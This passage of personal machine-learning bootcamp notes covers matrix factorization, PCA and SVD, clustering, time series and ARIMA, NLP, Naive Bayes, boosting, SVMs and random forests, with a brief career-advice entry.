on average; bj = item's average deviation from overall average.\n - Thus the cost function can be updated to reflect the bias equation.\n - SSS18 NMF Bias cost function\n\n\n\n\n160706\n 1. Non Negative Matrix Factorization\n - At a high level: Non negative matrix factorization is a method of dimensionality reduction, whereby you break down a single matrix into two component matrices, but which have inner dimensions of \"k\". K defines the pre-defined k number of latent features you wish to find/break down your original matrix into.\n - defining k here is similar to all other unsupervised learning techniques whereby you can define how many \"topics\" or categories you aim to find using the method.\n - It is similar to PCA and SVD, except in PCA/SVD, the two resulting component vectors (specified by the size of latent features k you are seeking...ie the inner dimensions of the component matrices) are by definition orthogonal, whereas in NMF, they do not have to be (and thus often are not)\n - SVD find orthogonal features between two matrices whereas NMF does not.\n - Operationally, NMF finds the decomposed matrices W and H via an optimizatio method called alternative least squares: You have a target vector V shape (n x m). You initialize matrix W to be random values, shape (n x k). You then calculate matrix H shape (k x m) to minimize the least squares between W and V.\n - You then fix H, and re calculate W to minimize least squares between H and V.\n - Repeat alternating until least squares is minimized beyond a threshold or for a set number of iterations.\n - V = W * H\n - SSS19 NMF equation\n - All values of V must be non-negative\n - In NMF You \"clip\" the values of the resulting matrices such that they are non-negative values\n - NMF decomposes feature matrix X (n x m) into W and H, which are not likely orthonormal\n - W is (n x k) represents the strength of each latent feature for each observation\n - H is (k x m) represents strength of each observed feature for each latent feature\n - k is number of latent features\n - W and H are learned via alternating least squares (ALS) as above\n - ALS is biconvex, so you don't always find the global optima. Better optima can be found with strategic initializations (like k means) or from multiple random initializations\n - NMF is an approximate factorization, and has non-unique solutions. Will find a local optima with non-convex RSS optimization\n - k features is a tunable hyperparameter\n 2. Extensions\n - Regularization with NMF when using ALS\n - In most cases of using NMF as a recommending system, you have data which is very sparse: ie data on many more items (movies, amazon items etc) than number of users--further the actual cells in this matrix that are occupied are the small minority.\n - Given this, for SVD, you are forced to fill in the values with zeros or something else, to which the algorithm subsequent fits, which doesn't make much sense and thus does not perform well.\n - with NMF, however, you don't have to impute missing values.\n - SSS17 NMF equation for recommendation\n - However, since W and H are randomly initialized in NMF, all values in these matrices are filled. Given the sparsity of the data as explained, this increases the likelihood that you will overfit the data given the simple RMS cost function.\n - Thus, adding regularization to the cost function (right side of the equation in SSS17), is the practical reality of using NMF on real world recommender-type data sets.\n - This regularized cost will serve to impose greater penalty on the wi and hj values that overfit the data, and this is applied DURING the ALS fitting process.\n - lambda is a hyperparameter which you can tune, ie via graph search, comparing resulting models via RMSE error or something similar.\n - In graphmodels, lambda is a hyperparameter as such, which you can tune.\n - Can choose K with a cross-validation process \n - cost function can be other than ALS such as information gain, gini index etc\n - See tomomorrow's lecture for info on BIAS accomodation via NMF\n 3. Project tips:\n - \"interesting\"\n - Focused question\n\n\n160705 Dimensionality Reduction\n 1. Principal Component Analysis\n - With many dimensions, many features are likely correlated, so if there is highly correlated data, there is redundant information. So we try to decorrelate the input vectors.\n - The covariance matrix of a feature space usually has a lot of large values\n - The ideal is to find the covariance matrix where all non-diagonal values are 0.\n - We can do this by defining that all of our PCA dimensions will be ORTHONORMAL to each other, thus by definition we remove all covariance from the covariance matrix between these dimensions.\n - ORTHONORMAL means that all vectors are unit vectors and are orthogonal to each other (dop product = 0)\n - The main idea is attempt to find a covariance matrix where all variables except the diagonal have minimal covariance with other variables, which means there is no relationship between the features\n - We can transform the matrix to make this happen\n - This corresponds to finding a new set of axes that better fit the data\n - Start by defining the first dimension to capture the maximal variance in the data\n - The second dimension (of this first component) is defined to be orthogonal to the first, so there is no covariance between the two features, given this definition\n - Our goal with PCA is to find the transformation matrix V which when applied to original data X which gives us our ideal covariance matrix.\n - In other words, to get the transformation, we need to find the eigenvalues and eigenvectors of M-T M.\n - The Eigenvectors are the new basis; the eigenvalues are the variance in each of these dimensions.\n - To reduce the number of dimensions to m << p, can get rid of the smallest lambdas\n - To determine how many features to keep , can look at the scree plot, plotting the variances (eigenvalues) in increasing order. Choose the elbow or wherever the most information is captured.\n - An eigenvector v of a linear transformation T is a non-zero vector that, when T is applied to it, does not change direction. Applying T to the eigenvector only scales the eigenvector by the scalar value lambda, called the eigenvalue.\n - T(v) = Lambda(v)\n - Each principal component projection is defined such that each tries to capture as much variance of the original data set.\n 2. Curse of dimensionality\n - Any technique that involves a distance metric suffers from this, which is that as features increase, the distance between them grows without bounds.\n - Heuristic, for a model to be effective you need the distance between points to be less than some value d. Thus, you need 1/d^p data points, if you have p dimensions.\n 3. Singular Value Decomposition: A method to help perform calculations necessary for PCA\n - Since calculating the eigenvalues and eigenvectors is difficult, the SVD technique allows for more efficient computation. SVD can also help find latent features.\n - SVD is based on the following: every matrix has a unique decomposition in the following form: X = U E V.T\n - U and V are orthonormal matrices (constraint imposed by the definition of PCA)\n - E is a diagonal matrix of positive values; can reduce dimensions by sending the smaller diagonals to zero. Thus this is the method of dimensionality reduction via SVD.\n - Plotting the scree plot and determining the elbow is a way to determine how many features/dimensions to keep.\n - Allows you to calculate the eigenvector/eigenvalues for matrices, without computing the matrices themselves (computationally intensive).\n - This is in fact what sklearn does under the hood to calculate PCA\n 4. Latent Features\n - Structure in the data that you don't observe directly\n - SVD can help discover latent features\n - In SVD/PCA, you find all the orthonormal matrices for every category of features in your data; so you usually end up with the same number of latent \"features\" as your original feature set.\n - However, you can then calculate the information gain from each given feature, rank them, and then choose to keep only 3 or 5 or whatever. This varies from NMF in that in NMF you pre-specificy the k number of latent features you wish to find at the beginning of the procedure.\n\n\n\n160701 K Means Clustering/Hierarchical Clustering\n 1. Supervised vs Unsupervised\n - The loss function (described by the (y - y-hat), ie MSE etc) effectively \"supervises\" our learning of the relationship between y = f(x).\n - In unsupervised learning. Can still try to discern structure from the x data.\n - Unsupervised learning is particularly sensitive to selecting the right model, and deciding which data goes into the model.\n 2. Clustering\n - Dividing data into distinct subgroups. Since we don't have labels, choosing the value of k is of particular importance, since you never know the truth and can't cross-validate to infer the best k\n 3. K Means\n - We want within-cluster variation to be small\n - Want assignment of points to groups so within cluster variation is the smallest. So one way is to minimize the squared euclidean distance between all pairwise points\n - K means procedure:\n - start by randomly assigning each data point to a cluster.\n - computer the centroid of the cluster\n - re-assign the data points to the nearest centroid\n - recompute centroid\n - reassign data points...and repeat until no further change.\n - Techniques to choose K, or to \"learn\" k\n - Elbow Method: Compute within cluster variation (sum of squares) for several values of K. Thus there often will be a k after which the decrease in variation decreases. So you pick the elbow. But there is not always an obvious elbow on which to pick k.\n - GAP statistics\n - Silhouette Coefficient\n - Curse of Dimensionality\n - Since we're computing distances between points in k means, in high dimensional spaces, distances become far apart in high dimensions.\n - Amount of data needed to compensate for high dimensional data increases quickly\n 4. Hierarchical Clustering\n - Algorithm: each point is its own cluster, merge closest clusters, and end when all points are in a single cluster.\n - don't have to choose k at the start, number of groups depends on where we cut the dendrogram\n - Several distance measures to consider using, resulting in different dendrograms. Most common are complete and average\n\n\n160630 Time Series\n 1. Reading notes:\n 1. One main goal is to account for the correlated nature of points, which explains their relative \"smoothness\" in time series data. So try to describe some mathematical model to describe the appearance of the data observed.\n 2. Methods include using white noise,\n -moving averages: replaces a white noise series w-sub-t with an average of its current value and its immediate neighbors past and future.\n - Autoregressive- uses the two previous values\n - Random Walk with Drift - random white noise movement with a drift (slope?) factor\n 2. Time Series Lecture: analysis of experimental datat observed over time, usually equally spaced.\n - Conventional statistical methods are restricted given the correlation of adjacent time points; given assumption of independent and identically distributed data\n - Overal: find a pattern from past data at hand, and forcast into the future\n - Assumptions is that the pattern will continue\n 3. Components of a time series\n - Trend - long run up and down of the series.\n - Cycle: upward/downward around the trend\n - Seasonal Variations: patterns following yearly patterns\n - Irregular Variation: remaining erratic movements that can not be accounted for\n - Goal is to estimate the trend, cycle, seasonal components of a time series so all that's left is irregular fluctuations\n 4. Time Series Regression\n - Linear regression featurized time: discarding assumption of normalized residuals\n - Literally add a factor to the linear model for trend\n - Similarly model seasonal variable using seasonal or seasonal-dummy variables.\n - Model L seasons in SNsubT using L-1 indicator variables S1 through SL-1\n - SSS10 Time Series Trend Series\n - Binning of time series data (past) is informed by the goal of forecasting. What do you want to predict?\n - Additive Decomposition: y = TR + SN + CL + IR , defined as trend, seasonal, cyclical and irregular factors.\n - Estimate SN t by grouping seasons and averaging and making it zero scale.\n - Estimate TR t by subtracting out seasonalized estimates , and fit a standard regression\n - Estimate CL t by removing the season and trend, and perform a moving average\n - The average of irregular fluctuations will appx be zero\n - Estimate IR t by looking at the residual after removing the main components\n - We assume that hte pattern continues into the future and that there is no pattern in the irregular component: therefore we predict IR t to be zero, thus the point estimate of IR at time t is zero.\n - Thus forecast of point estimate at time t is y = tr + sn + cl (all sub t).\n - Can give a prediction interval y +/- B sub (t, alpha), B is the error bound in a prediction interval\n - Key assumption of additive decomposition is additive variation over time. If this doesn't hold and you can't stabilize the variance, can try multiplicative decomposition\n - Smoothing methods\n - Simple exponential smoothing: Used when there is no significant linear trend (ie slope), but mean is changing over time\n - If the mean remains constant, then the standard linear model can be used, giving equal weight to all time points\n - If mean is changing slowly may better capture trend if we can give more weight to more recent observations than older observations, which is simple exponential smooothing.\n - Optimize value of alpha (which weights most recent data value)\n - SSS11 Exponential Smoothing\n - SSS12 Exponential Smoothing equation: So for more distant observations (x from current), the weight (alpha(1-alpha)^x) gets driven to zero, so more recent observations have a higher weight\n - alpha is a hyperparameter to optimize by minimizing sum of squared error SSE\n - SSS13 The error bound for more distant observations (farther from today) will get larger. Since when alpha is large, the error term (Tau -1) x alpha squared gets driven to zero\n - Hold's Trend Corrected Exponential Smoothing : allows for modeling both a linear trend (slope) that changes over time\n - Allows modeling of the mean and the growth rate (slope or linear trend) to change with time.\n - Allows us to take int o account growth rate, by adding a factor \"b\".\n - thus have both alpha and gamma hyperparameters\n - SSS13-2 Holt's Exponential Smoothing\n - Holt Winter's Exponential Smoothing : adds a component of seasonality to the linear trend/slope.\n - Similar to Holts, but it additionally takes into account an additional seasonal factor\n - Note that you ned to have data of enough seasons in order for this to work\n 5. ARIMA:\n The Box-Jenkins Methodology applies autoregressive moving average models to find the best fit of time series based on past values.\n 1. Approach:\n - SSS13-3 ARIMA model approach\n - Model Identification\n\n - The autocorrelation function is the correlation between the current time and the time x times ago. Uses pearson correlation coefficient\n - Partial auto- correlation, is the correlation between two separated points with the effect of the intervening points conditioned out. Almost like multivaraible linear regression with intervening time points as variables.\n - SSS13-4 Partial Autocorrelation\n - See ipython notebook notes for examples of autocorrelation and partial autocorrelation plots SSS13-5 Autocorrelation/partial correlation plots\n - So note the first time point 0, correlation is 1 (since correlated with itself), but for autocorrelation, as you get farther out, correlation decreases.\n - For partial autocorrelation, after taking into account the first lag, the second lag actually has little additional correlation.\n - Stationary Time Series:\n - A time series for which the statistical behavior of a set of observations is identifical to that of the shifted set of observations for any collection of time points for any shift h (lag). This is a VERY STRONG ASSUMPTOIN.\n - So the weak stationary assumption is that this holds for the first two moments : mean and covariance (with it self h-lags away). These are less reliant on time.\n - In reality, most time series are not stationary.\n - So how to modify the time-series to improve the approximation of stationarity\n - Detrending - constraint 1\n - differencing - constraint 1\n - transformation - constraint 2\n - These are methods to try to turn nonstationary data into stationary data so we can model it using ARIMA, given the ARIMA asusmptions of stationary data\n - Use Autocorrelation (AC) or partial AC plots to compare the how well each method (detrending or differecing)\n - for deternding, plot the residuals on an autocorrelation plot to see whether you adequately removed autocorrelation\n - So keep examining autocorrelation plots to see whether you've adequately addressed the stationarity assumption using your methods above: deternding, differencing, transformation.\n - IN J&J example, needed to take log, difference and difference the seasonality (every 4th quarter), before we acheived statioarity.\n - NOte, detrending via linear regression may allow us to take into account multiple variables other than time in the modeling (since ARIMA can't do this).\n - Once we achieve stationarity, we take a look at the timepoint where decay is achieved at timepoint k. This will help determine how far back to consider correlation between observations.\n 6. Autoregresive Models :\n - Autoregressive-po models is based on the idea that the present value of the series can be explained as a function of the p past values. So use PACF plot to determine p, see slides.\n 7. Moving Average Model:\n - assumes that white noise is combined linearly to form the observed data.\n - based on prior errors\n - Use ACF plot to determine q,\n 8. Autoregressive Moving Average Model ARMA:\n - So ACF will identify the q parameter\n - PACF will identify the p parameter\n 9. ARIMA :\n - Additionally takes into account for d, the number of differences needed to achieve stationary\n - This then provides the model by whcih you can predict future values (your model can) as a function of x-prior data points and coefficients \n 10. Seasonal differences can also be modeled in S-ARIMA.\n 11. Fit the best candidate models and compare how models perform using AIC or BIC comparison\n 12. After lab learnings:\n A. It sounds like the approach is as follows: view the AC and PAC plots to get a sense of the k-units lag from the PAC (p) and the AC (q) plots.\n B. Next step is to make data stationary: Can play with detrending, but ultimately, it seems differencing is the better technique to try to achieve stationarity of the data. However, be aware of overdifferencing\n - you detrend (often) by fitting an OLS to the data, and plotting ACF, and PACF plots to the residuals\n - second order differencing is the equivalent of a second order derivative of the data\n C. Once you've achieved stationarity of the data via differencing and or detrending, then you need to determine the p and q parameters by looking at the PACF and ACF plots and noting lag.\n - if you notice lag in either PACF or ACF plots, these will inform the remaining parameters p and q respectively in your ARIMA model, based on the number of k-lag days you observe as significant in the plots before they drop within the error bounds.\n - Note that your choice of the seasonality parameter L will seem to (i believe) inform the numbers you choose for d and maybe little p/q, since if L is 7, then a D of 1 I believe suggests a 7x1 differencing that is significant.\n - Less clear on how to pick P/Q relative to p/q and even D relative to d.\n D. Then plug all these parameters into ARMIA and then tune further based on ACF and PACF plots until adequate.\n 4. Time Series Review Moses 7-5-16\n - For the p, partial autocorrelation, you'll only see the lag at that point (ie k=7), in contrast to the autocorrelation where you'll see the lag up TO that k value.\n -\n\n\n\n\n\n160629 Model Comparision summary\n 1. RF :\n - Fast, works well out of the box\n - Sensible feature importances\n - Accurate\n 2. Gradient Boosting\n - More accurate, but requires much more tuning of hyperparameters compared to RF\n - Partial dependency plots can try to get at the interpretability of the relative importance of the features\n 3. Logistic Regression\n - More interpretable\n - Con: Intperetabilty becomes harder with categorical variables and making dummy variables, because everything is with respect to the baseline...even for OTHER variables\n 4. Performance metric:\n - Choose based on priority to your application at hand: ie minimizing false negatives (ie churn), or other.\n - Recall\n - F1\n - Accuracy might have been bad in this situation because of the imbalanced classes (churn was 60%)\n - Accuracy may also be bad if there is a cost imbalance\n 5. Leakage: an example would be somehow leaving target data in a derived variable within the data. Ie calculating churn using last ride taken, and leaving in last ride taken.\n 6. Possible starter paramter ranges for grid search over Gradient Boosting Trees:\n learnign rate 0.1-0.01\n max depth 4-6\n min sample 3,17\n max features 1-0.1\n n_estimators 100\n 7. BIG UNDERSTANDINGS:\n - SSS14 CV and Test Train Split\n - cross validation is generally only ever used with training data. Use this to obtain an estimate of what your test error might be, without ever using your test data (until the very end) to train your model.\n - For grid search and cross_val_score, you only ever need to feed this training data. Never really feed it test data\n - Select best model after you've tuned your parameters by comparing cross_val_score on trainig data only.\n - Once you've selected your best model, THEN you can use that model (with set coefficients) on test data to obtain an estimate of test error. This generates the parameters of accuracy and or other relevant metrics that you can tell others about to describe your model.\n - Then, if desired, you can refit coefficients on the entire data set before using this to predict future data.\n\n\n\n160629 Michelle Career lecture\n 1. Resume ideas:\n Programming: Python, Pandas, Numpy, Scipy, sklearn, NLTK\n Visualization: Matplotlib, seaborn, plot.ly\n Databases: SQL, MongoDB\n Distributed Systems: Spark, MapReduce,\n\n\n160628 Intro to Natural Language Processing\n 1. Methods to featurize documents of text\n A. Bag of words: create a vector of word counts, regardless of punctuation, capitaliation\n - Order of words matter here\n - sklearn has a vectorizer fnction for bag of words\n - once documents have features vectorized, can compare documents\n - using euclidean distance, you look at vector-distance, which may not make intuitive sense in the sense of a vector of different length but pointing in the same direction\n - cosine similarity : looks at the direction of the vectors rather than length/distance. thus this is often a more useful classifier.\n - SSS8 Cosine similarity\n - Bag of words is naive, just word counts, with equal word having equal weighting. Sense that word counts should be adjusted based on frequency.\n B. \"TF*IDF\" : Term Frequency, Inverse Document Frequency:\n - Words in only in one document (rare), have higher weighting. Words found in every document have lower weighting.\n - Note, similar in equation to information/entropy from classification trees: ln(1/p).\n - Basically rank words based on amount of information gain\n - SSS9 Inverse Document Frequency\n - Often more useful than bag of words, sklearn has tfidf vectorizer\n C. Feature Engineering for text\n - Tokenize (to turn words into their category, perhaps changing posessives to original word, expanding contractions aren't to are not etc)\n - Remove stop words: removing words offering less information such as \"the,\" there are standard lists of stop words.\n - Stemming : walked -> walk\n - Lemmatizing: people -> person. There are standard lemmatizers\n - N-grams: tokenizing several words together: \"the cat\", \"cat in\". Serves to expand the feature space. Takes into account word proximity\n - Skip Grams: does N-grams, but skips x words. So categorizes proximity of words.\n - Dependency/probabalistic parsing: takes into account word dependencies on each other, some grammatical/syntactic associations between words\n\n160628 Naive Bayes Lectures\n 1. Maximum A Posteriori : predicts the outcome most likely under the posterior distribution.\n - Given a prior distribution P(H), and the likelihood of observing some data X across a set of hypotheses, we predict the hypothesis that maximizes the probability of P(H given X).\n - Since P(X) does not depend on the hypothesis, MAP estimation works by maximizing the numerator P(X|H)xP(H). \n - SSS7 Maximum A Posteriori\n - Conditional independence only holds between events A and B when C is true. It is a key assumption about the features in the Naive Bayes Model. A and B are not independent when C is not true.\n - Bayes is a Generative model:\n - Prior models are discriminative model, estimating the conditional distribution P(Y|X).\n - Generative models: estimates the joint distribution of P(Y|X) and P(X). So in addition to estimating the distribution of the target, is also estimates the population distribution of the features X.\n - This estimated joint distribution allows us to generate new synthetic data by sampling from the join distribution.\n - Naive assumption of Naive bayes: that each of the features are conditionally independent given Y. Though this is not always true, this does not generally change the MAP estimate.\n 2. Applying Naive Bayes to Document classification\n - Multinomial event model. Assumes that a category of ie book type have a higher probability of predictors ie words, than other types.\n - The Prior Distribution is estimated from a sample or corpus of documents. The probability of any class is estimated to be those from the sample population.\n - The conditional distribution represent the frequency of each vocabulary word in each class of document. Estimated by counting number of times a word shows up in a given class, divided by the total length of documents in that class. (So frequency of words in a give class of document).\n - The naive bayes model for text classification is the product of the conditional probabilities of each word given a type of document and the probability of that document (the product over all words). And the hypothesized document class that maximizes this probability is what is predicted by the Naive Bayes model.\n - Risk of numerical underflow. Since each probability in Naive Bayes for a given document (ie 2000 words) is small, there is a risk that each probability is too small for a computer to easily represent.\n - Log transformation of the probabilities can get around this.\n - Laplace Smoothing. Sometimes new words are found in the test set did not appear in that class of the training set. Thus, the solution is to add 1 to each word's frequency, to get around this.\n - Unknown words: If a new words was not seen in any class throughout the trainign set, this can also cause a problem. Can add a generic unknown word to the vocabulary and give it a small probability.\n - In theory, can also use a number of distributions for Naive Bayes.\n - Naive Bayes Pros:\n - Good with wide data, with more features than observations.\n - Fast to train, and good at online learning\n - Simple to implement.\n - Cons:\n - Can be hampered by correlated features\n - Probabalistic estimates are unreliable when class estimates are correct given the naive assumption.\n - Some other models can perform better, with better accuracy.\n\n\n160627 Web Scraping\n 1. NoSQL databases\n - Not Only SQL: MongoDB is a flavor of NoSQL.\n - NoSQL paradigm is schemaless, which is an advantage in some cases\n - MongoDB is a document-oriented DBMS\n - Collections in Mongo are like dictionaries in python\n - JSON Javascript Object Notation, formalized formatting for their objects/dictionaries.\n - Can have data redundancies in documents (non-normalized data), as Mongo does not enforce normalized data\n - A change to database generally results in needing to change many documents\n - Since there is redundancy, simple queries are generally faster, but complex queries are often slower.\n\n\n\n\n160624 Chat with Michelle\n\n- To get valuation, ROT is to multiply seed amount by 5 (ie they got 20% of the company’s total estimated valuation)\n- For A round, can multiply by 3-4, ie investors got 25%-30% of the company.\n- But basically try to ask for the actual valuation or preferred share stock price to to calculate tax burden.\n\n\n160624 Imbalanced classes\n--> Ways around it:\n 1. Cost sensitive learning\n - Thresholding: plot expected profit over each threshold, then can select the threshold with the highest profit\n - Some models have explicit cost functions that can be modified to incorporate classification cost\n - less frequently used\n 2. Sampling methods\n - Undersampling: randomly discards majority class observations\n - Works, and can reduce runtime on large datasets, but discards potentially important observations.\n - Oversampling: randomly replicate minority class observations to balance the training sample\n - Doesn't discard information, but is likely to overfit.\n - SMOTE : Synthetic Minority Oversampling Technique: Generates new observations from minority class.\n - Basically takes a random KNN of the minority class\n - In the imaginary x1-x2 (can be extended to x-i) grid space for the two selected points, it will generate a random point somewhere between those two points, varying on all features x1-xi.\n - Create x amount of these points to \"oversample\" the minority class.\n - CV to tune the k value of KNN for smote\n - Sort of assumes minority class points are clustered near each other, and can run into problems when they are not.\n - If minority class points are also clustered around the majority class points, ddthe SMOTE procedure could definitely weaken the ability to classify.\n - So there are certainly limitations with this method\n 3. Review of Metrics\n - F1 score: harmonic mean of precision and recall\n - ROC: If you know cost/benefit matrix, or a specific target precision/recall don't use AUC, since you can choose threshold to maximize PROFIT or those specific metrics.\n - AUC is more useful when exploring models to choose the best one\n\n\n160623 Boosting\n 1. Bias Variance Tradeoff:\n A. For regression trees:\n - Decrease bias by building deep trees\n - Decrease variance by using bootstrapped datasets such as in bagging, limiting features available at each node, pruning the tree, and majority vote ensembeling votes from various trees (averaging across trees decreases variance)\n B. Test methods of decreasing bias or variance by CV\n - In bagged decision trees, can use out of bag estimation to try to estimate external generalizability.\n 2. Boosting Big Picture\n A. Attempts to make certain trees \"become experts\" in certain aspects of the data\n B. Boosting combines a sequence of weak learners to form a strong learner. Force it to be weak by limiting how deep it can be.\n C. Each tree learner fits error from the prior learner. Thus its an additive model of weak learners. \"Forward stage-wise additive modeling\"\n 3. Ada Boost \"Adaptive Boosting\"\n - Each tree is expert on attacking error of its predecessor. So upweight misclassified points.\n 4. Gradient boosted regression trees\n - Each successive tree fits to the residuals of previous tree.\n - Therefore each subsequent tree truly becomes an expert in the errors of the prior tree\n - And the final prediction is an additive sum of the \"prediction\" for each tree.\n - Gradient Boosting SSS1.\n - The weight beta-m is the sum of the predictions of trees, the weight is higher for later trees, since they can\n - Note this is prone to overfit, since we're fitting to the errors of prior trees. So use CV to determine when to stop.\n - Shallow trees are higher bias, lower variance models. (High bias since shallow, low variance because if we took another sample of data from the population, another 3 split tree would look similar)\n - So by limiting sequential trees to 3 splits, you effectively hone in on the highest error regions of the prior tree, making splits that decrease error (MSE) the most for any given tree.\n - ??What if we bag boosted models?\n - Random forest lends itself for running on parallel computers or cores on a computer. Sequential tree methods such as Gradient Boosting or AdaBoost can not take advantage of parallel processing.\n - In a Random Forest, as you build more trees, the test error should decrease and eventually level off. In Boosting, as you build more trees, the test error should decrease and level off, but then increase if you boost too much. However sklearn describes that GB is fairly robust to overfitting (ie test error increasing)\n 5. Parameter tuning\n - Could set a shrinking learning rate, \"SHRINKAGE\", meaning that we'll only apply 20% of what each subsequent tree suggests to do. Can prevent over fitting.\n - This will require higher n_estimators/trees, because it by definition learns much slower.\n - Ultimately will lead to lower test error with shrinkage. But requires more trees to get there.\n - Since this generally works: so one strategy is to tend to pick the max number of computationally possible trees to make (given time) and search over several hyperparameters discussed here via CV.\n - one of the hyperparameters will be learning rate\n - Parameter tune tree structure:\n - Max depth: controls degree of interactions between variables; often not larger than 4-6\n - Min samples per leaf: limits overfitting\n - Number of trees should also be tuned, because if you have too many, test error tends to increase, due to overfitting\n - Note that the SHRINKAGE parameter (learning rate in GB) is very important, and if not included (ie for stochastic gradient boosting below), can lead to unstable estimates because full votes from subsamples tend to go in a worse direction. so need to limit their vote\n 6. Stochastic gradient boosting\n - So fit to a fraction of the total data at each step\n - Also fit a random subsample of features (like random forests)\n - In Sklearn's implementation of gradient boosting, max_features limits the features space explored for best split at each node.\n - These two techniques lead to both improved accuracy and decreased computational time\n - Often need to ensure a Shrinkage parameter for these to work.\n 7. sklearn.grid_search\n - input dictionary of hyperparameters and a list of their options.\n - Will cross-validate search over permutations of parameters and return the best combinations of parameter.\n - SKlearn recommends: setting n_estimators as high as possible (3000,5000)\n - Tune all hyperparameters via grid search\n - Further optimize n-estimators and learning rate\n - Can review Rs's gbm package documentation\n - You must tune the model to get good performance\n 8. Diagnostics\n A. Ways to infer feature importance from black box models\n - Partial dependency plots\n - Take your feature/variable x1 you want to study. Change all data points x1-i to x1-j to values x1i through j sequentially. IE CHANGE ALL VALUES to x1-i once, then X1-i2 once etc.\n - record the predicted output y of your model\n - then can generate a plot for a given feature of how your model predicts y to change based on numeric changes of feature x1.\n - can repeat for all features and obtain a sense of the importance of each feature in your model. ie some inferential power.\n - can also do partial dependence plots for 2 variable interactions. to try to see if there is interaction by slope of plane?? not sure\n - Variable importance measures\n - Recall we discussed for bagged/RF trees, decrease in RSS for a given predictor averaged over all trees. Or change in Gini index for a given predictor, averaged.\n - Sensitivity analysis, where you sequentially change the value of a feature and see response change (similar to partial dependency plots)\n 9. AdaBoost\n - Significance of a given tree to the final model is weighted by the amount of error it demonstrates.\n - So it effectively upweights trees that perform better, whcih will be later trees in many cases.\n - error is defined as the number of mis-classifications over total predictions\n - AdaBoost Formula SSS2\n 10. XG Boost\n - For every given feature, keep only the percentiles of that feature, which greatly reduces the space over which the algorithm needs to decide where to split.\n - but you still keep all observations of the data.\n - so you get computational speed gains to grow a tree\n - This serves as a form of regularization, resulting in a slightly less complex model and less variance.\n\n\n\n\n\n ```\n ***MAKE A DECISION TREE OF THE HIERARCHY OF TREE BASED METHODS, FROM DECISION TREE TO BAGGING TO RANDOM FOREST TO BOOSTING. TO BEST UNDERSTAND THESE METHODS\n ```\n\n\n\n ???max depth in boosting decreases variance?\n ???review tree HIERARCHY\n ???stochastic gradient boosting defined by max features and subsample only?\n\n\n\n\n\n160622 Liga Data lecture\n 1. Perform sensitivity analysis (change values of each data point for each variable and see the effect on output) to help determine the most important features. See sensivity_analysis on wiki. OFAT\n 2. Concept of Dependent by Category DBC:\n - Of the top 10 or so variables, systematically create hierarchical interactions.\n - Maintain a matrix of the calculation of the importance of each of the interaction variables (ie via sensitivity analysis method above)\n - This can often help identify the most important features for a model (the interactions), since the important interactions will often be from the most important features (independently) and aren't too deep (one or two, rarely 3+)\n - Can also update the matrix when new data comes in to perform a model \"refresh\" rather than a full retrain. Not sure, but this may also help to allow selection of other interactions based on the new data, by comparing the pre-post performance of the interactions performance on your matrix\n - Can help with a model in production to refresh faster without too much investment of time/effort\n 3. The larger the gap between training and test performance suggests worse generalizability of the model. So try to create a gap-adjusted performance metric to account for this. Want models to be generalizable, so don't just consider test performance\n 4. http://dmg.org/ for a list of pmml data mining software, analysis methods and pmml compatability, which can help with production, since pmml is a portable code standard?\n\n\n\n160622 Support Vector Machines\n 1. Support vector classifier\n - need to scale data\n - known as a \"maximal margin classifier\"\n - works based on defining a hyperplane to the data (only works with perfectly separable data) which has a normal vector w.\n - The dot product of the normal vector w with unknown point u: if the sign is positive or negative, it will classify the point to one side or the other of the hyperplane.\n - In order to make the hyperplane most generalizable, you want to maximize the distance between the nearest points and the hyperplane.\n - Do this by setting up a margin around the hyperplane and this effectively is a constraint.\n - How to you optimize an equation with a constraint? Several ways but LaGrangian? is one way. \n - Essentially we want to solve for w, which defines the orientation of the hyperplane, whcih is the important part.\n - b defines the distance of the hyperplane from the origin (constant? for a given plane).\n - So the optimization equation solves for alphas, relative to y (labels) and x's (points).\n - alpha goes to zero for all NON SUPPORT vector points. Therefore in w = sum(alpha-i, y-i, x-i), alpha is only relevant for the points closes to the line/margin.\n - The solution for alphas allow you to solve for w (normal vector of the hyperplane) with the equation above.\n - Since x's and y's only matter for support vector points (since alphas for all other points go to zero), SVC can be a CONCISE REPRESENTATION of a large data set.\n - The optimization equation, however, is hard/slow to solve. Which is a limitation.\n - There are inherent properties of SVT which limit overfitting\n - SVMs shine with moderately sized data, given its benefits, discussed below, but is slow/less optimal for very large data sets.\n 2. Slack variable\n - Adding a slack variable which establishes a \"budget\" for how many points can be on the \"wrong\" side of the margin. Slack variable is \"squiggle\" in the lecture.\n - This allows for SVC to function with (real world) non separable data\n - Do this by changing the hyperparameter C in SVC in sklearn, which denotes the cost function. The smaller it is, the wider the margins are. The larger it is, it will converge on the smallest road\n - All points within the margin are now considered support vectors\n - Since w = sum(alpha * xi * yi), as the margins change, and different numbers of support vectors are used, the slope of the dividing hyperplane will change, since the slope is determined by the normal vector w.\n 3. Kernals:\n - Kernals allow us to get the result of the dot product of vectors after being transformed to a higher dimensional space without needing to know what the transformation is.\n - the kernals transform vectors to an \"infinite dimensional\" space. thus it is possible to find a boundary that classifies any point, in theory.\n - In other words, it allows us to fit SVCs to very non-linear boundaries to classify data.\n - Note that it is possible to overfit data using this, ie drawing a boundary around every single data point = not generalizable.\n - Kernals most often used are: linear, polynomial of degree d and radial basis function (gaussian) 'RBF'\n - RBF is the commonly used kernal though prone to overfitting\n - As you increase gamma (in SVC in SKlearn), the variance around each boundry decreases (more likely to overfit)\n - As C increases, model tries to not get points wrong or misclassified, so again, more likley to overfit.\n - A Grid Search: calculate validation accuracies (crossvalidation) for changing C and gamma hyperparameters, to identify the optimal values of the hyperparameters\n 4. For multiple classes, create an SVM model for one versus all or pairwise (one versus one, pairwise).\n -Then predict based on majority vote based on all the models\n\n\n160621 Random Forest\n 1. Review of Decision Trees\n - In regression trees, the tree effectively performs axis-parallel splits, cordoning off the data into regions defined by lines parallel to the (x,y,z etc) axis.\n - This is inherently different from linear regression models which speak to their strengths in some settings\n - How to regularize decision trees: Pre and post pruning\n - Post pruning; after fitting trees deeply, decide threshold to prune back tree. - Ie one threshold is to prune back to minimum of data in a terminal node > the p available features\n - Pre pruning: define a penalty term alpha where alpha * abs(#terminal nodes) is a penalty term added to the MSE, and minimize this equation. Cross validate to determine alpha. ** This is used most commonly **\n - * However, ensemble methods to build trees ie random forest will almost certainly do better than either pre/post pruning *\n - Recall that in classification trees, chose an error metric such as Gini or Entropy error functions, both of which perform very similarly. In regression trees, use RSS to calculate information gain.\n - Making predictions, at each terminal node, for regression: predict using average. For classification: predict the most commonly occurring class.\n 2. Pros and Cons of decision trees\n - Pros: how we think, easy to explain\n - Cons: tend to overfit--do not strike balance of bias/variance tradeoff well, computationally intense\n - 